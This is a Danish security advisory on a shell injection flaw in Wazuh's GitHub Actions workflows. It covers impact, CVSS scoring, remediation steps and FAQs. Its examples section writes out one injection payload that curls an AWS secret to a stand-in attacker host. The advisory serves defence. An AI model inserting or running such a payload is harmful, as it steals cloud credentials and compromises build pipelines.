CVE-2026-67308: Kritisk Wazuh GitHub Actions-sårbarhed
Kritisk sårbarhed i Wazuh’s GitHub Actions-workflow giver angribere fuld kontrol via en manipuleret pull request.
Hvad er det?
CVE-2026-67308 er en såkaldt shell injection-sårbarhed (en fejl hvor ondsindet kode smugles ind via tekst-felter) i Wazuh’s automatiserede byggeproces på GitHub. Fejlen ligger i den måde, filen VERSION.json behandles på i GitHub Actions-workflows. Hvis en angriber sender en pull request (et forslag til kodeændring) med en manipuleret VERSION.json, kan vedkommende få systemet til at udføre vilkårlige kommandoer. Det sker, fordi indholdet fra filen indsættes direkte i shell-kommandoer uden at blive tjekket for farlige tegn. Sårbarheden er udbedret i commit 44bf114.
Hvem rammer det?
Sårbarheden rammer organisationer og udviklingshold, der:
- Bruger Wazuh som sikkerhedsplatform og selv bidrager til eller kører Wazuh’s kildekode via GitHub.
- Kører self-hosted GitHub Actions runners (dvs. egne servere der udfører automatiserede bygge- og testprocesser frem for GitHub’s egne servere).
- Har AWS-legitimationsoplysninger eller andre hemmeligheder gemt som GitHub-hemmeligheder i det pågældende repository.
Hvis du blot installerer og bruger Wazuh som et færdigt produkt uden at arbejde med kildekoden på GitHub, er du sandsynligvis ikke direkte eksponeret.
Hvad kan ske?
En angriber der udnytter denne sårbarhed kan:
- Udføre vilkårlige kommandoer på den server der kører din GitHub Actions-runner — med potentielt adgang til hele serveren.
- Stjæle din GITHUB_TOKEN, som giver adgang til at ændre kode, oprette releases og administrere dit GitHub-repository.
- Stjæle AWS-nøgler og andre legitimationsoplysninger gemt som hemmeligheder, hvilket kan give adgang til din cloud-infrastruktur.
- Eksfiltrere data (sende fortrolige oplysninger ud af dit netværk) uden at du opdager det med det samme.
Konsekvenserne kan i værste fald være et fuldt kompromitteret udviklingsmiljø og lækage af adgangsoplysninger til kritiske systemer.
Hvor alvorligt er det?
Denne sårbarhed har fået den højest mulige CVSS-score på 10.0 (Kritisk). Det afspejler flere alvorlige faktorer:
- Netværksbaseret angreb: Angrebet kan udføres over internettet — angriberen behøver ikke fysisk adgang.
- Ingen forudgående adgang kræves: Angriberen behøver hverken brugernavn, adgangskode eller særlige rettigheder for at starte angrebet.
- Ingen brugerinteraktion nødvendig: Det er nok at sende en pull request — ingen fra din organisation behøver klikke på noget.
- Fuld fortrolighed, integritet og tilgængelighed truet: Alle tre grundpiller i sikkerhed er i spil ved et vellykket angreb.
Kort sagt: Truslen er maksimal, og adgangsbarrieren for en angriber er minimal.
Hvad gør jeg nu?
Hvis din organisation bruger Wazuh’s kildekode og kører GitHub Actions-workflows, skal du handle hurtigt. Følg disse trin:
- Opdatér dit Wazuh-workflow-repository til et commit efter
44bf114, som indeholder rettelsen. Tjek GitHub for den nyeste version. - Tjek dine GitHub-hemmeligheder — gennemgå hvilke hemmeligheder (tokens, AWS-nøgler mv.) der er gemt i det berørte repository.
- Roter alle mistænkte legitimationsoplysninger — udskift din GITHUB_TOKEN og alle AWS-nøgler eller andre credentials der har været tilgængelige fra den pågældende runner.
- Gennemgå dine runner-logs — undersøg om der har været mistænkelig aktivitet eller uventede kommandoer i dine GitHub Actions-kørsler.
- Begræns pull request-rettigheder — overvej at kræve godkendelse (review) af workflows fra eksterne bidragydere, inden de må køres.
- Kontakt din it-leverandør eller Auroa hvis du er usikker på, om du er berørt eller hvordan du gennemfører ovenstående trin.
Handl inden for 24-48 timer
Vi anbefaler, at du øjeblikkeligt opdaterer dine Wazuh-workflows til den rettede version og roterer alle legitimationsoplysninger der har været tilgængelige på berørte runners. CVSS-scoren på 10.0 og den lave angrebsbarriere betyder, at denne sårbarhed bør behandles som en akut hændelse — ikke som en opgave der kan vente til næste sprint. Hvis du er i tvivl om din eksponering, er du velkommen til at kontakte Auroa for en hurtig vurdering.
Tidslinje
Konkrete eksempler
Ekstern bidragyder kaprer hemmeligheder via pull request
En angriber finder et open source-projekt baseret på Wazuh-workflows og opretter en fork (en kopi af koden). I sin pull request ændrer vedkommende VERSION.json til at indeholde shell-metategn — fx $(curl https://ondsindet-server.dk/$(cat $AWS_SECRET_ACCESS_KEY)). Når workflowet kører på projektets self-hosted runner, sendes AWS-nøglen direkte til angriberens server, inden nogen opdager det.
Angriber overtager hele GitHub-repository
Via den samme teknik injicerer en angriber kommandoer der udnytter den automatisk genererede GITHUB_TOKEN til at oprette en ny adminbruger i repository’et eller tilføje en bagdør direkte i kildekoden. Da GITHUB_TOKEN har skriveadgang, kan angriberen ændre kode, slette branches eller udgive falske releases — alt sammen uden at nogen godkender det manuelt.
Kompromittering af cloud-infrastruktur via stjålne AWS-nøgler
En angriber udnytter sårbarheden til at eksfiltrere AWS-adgangsnøgler fra runner-miljøet. Med disse nøgler logger vedkommende ind i virksomhedens AWS-konto og opretter nye brugere, tilgår S3-buckets med kundedata eller igangsætter dyre cloud-ressourcer på virksomhedens regning. Skaden opdages først dage senere via en usædvanlig AWS-faktura.
Ofte stillede spørgsmål
Bruger vi Wazuh som sikkerhedsværktøj — er vi i fare?
Ikke nødvendigvis. Sårbarheden ligger i Wazuh’s udviklingsworkflows på GitHub, ikke i selve Wazuh-produktet du installerer og kører. Hvis din organisation kun anvender Wazuh som et færdigt sikkerhedsværktøj uden at arbejde med kildekoden på GitHub, er I sandsynligvis ikke direkte berørt. Kontakt os hvis du er usikker.
Hvad er en 'self-hosted runner', og om vi har en?
En self-hosted runner er en server — fysisk eller virtuel — som din organisation selv stiller til rådighed, så GitHub Actions kan køre automatiserede opgaver på jeres eget miljø frem for på GitHub’s servere. Det er typisk noget udviklingsteams sætter op. Spørg din it-ansvarlige om I bruger det — kig evt. i jeres GitHub-repository under Settings → Actions → Runners.
Hvad gør vi, hvis vi opdager at vores GITHUB_TOKEN eller AWS-nøgler kan være stjålet?
Handl straks: Tilbagekald og regenerér GITHUB_TOKEN via GitHub’s sikkerhedsindstillinger, og deaktivér/roter alle AWS-adgangsnøgler via AWS IAM-konsollen. Gennemgå derefter logfiler for tegn på misbrug — fx uautoriserede ændringer i repositories eller uventede AWS-API-kald. Kontakt Auroa hvis du har brug for hjælp til hændelseshåndtering.
Kan angriberen ramme os, selvom vores pull requests skal godkendes?
Et godkendelseskrav (required review) for pull requests er en god forsvarsmekanisme og kan reducere risikoen markant, da workflowet ikke køres automatisk ved en ekstern pull request. Sørg for at GitHub Actions-indstillingerne kræver godkendelse fra en betroet bidragyder, inden workflows køres for pull requests fra gafler (forks) eller ukendte bidragydere. Dette er en vigtig midlertidig kontrol, mens du venter på at patche.
Hvornår kom rettelsen, og hvad præcist blev ændret?
Rettelsen er tilgængelig fra og med commit 44bf114 i Wazuh’s repository. Ændringen sikrer, at indhold fra VERSION.json ikke indsættes direkte i shell-kommandoer uden korrekt validering og escaping af farlige tegn. Opdatér dit lokale workflow til at bruge denne eller en nyere version.
Påvirker dette vores compliance eller forsikring?
En ikke-patchet kritisk sårbarhed med CVSS 10.0 kan have konsekvenser for NIS2-overholdelse, ISO 27001-certificering og cyberforsikring, da de typisk kræver rettidig håndtering af kendte kritiske sårbarheder. Dokumentér dine afhjælpningsskridt og tidspunkt for patching — det beskytter jer ved en eventuel revision eller forsikringssag.
CVSS-detaljer
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-svaghedstyper
Original NVD-beskrivelse (engelsk)
Wazuh workflows before 44bf114 contain a shell injection vulnerability in GitHub Actions that allows attackers to execute arbitrary commands by submitting pull requests with crafted VERSION.json files. Attackers can inject shell metacharacters into environment variables that are directly interpolated into run steps, enabling command execution and exfiltration of secrets including GITHUB_TOKEN and AWS credentials on self-hosted runners.
Referencer & kilder
Eksterne kilder
Brug for hjælp med jeres sikkerhed?
Vi hjælper SMV’er med at omsætte trusler som denne til konkrete handlingsplaner.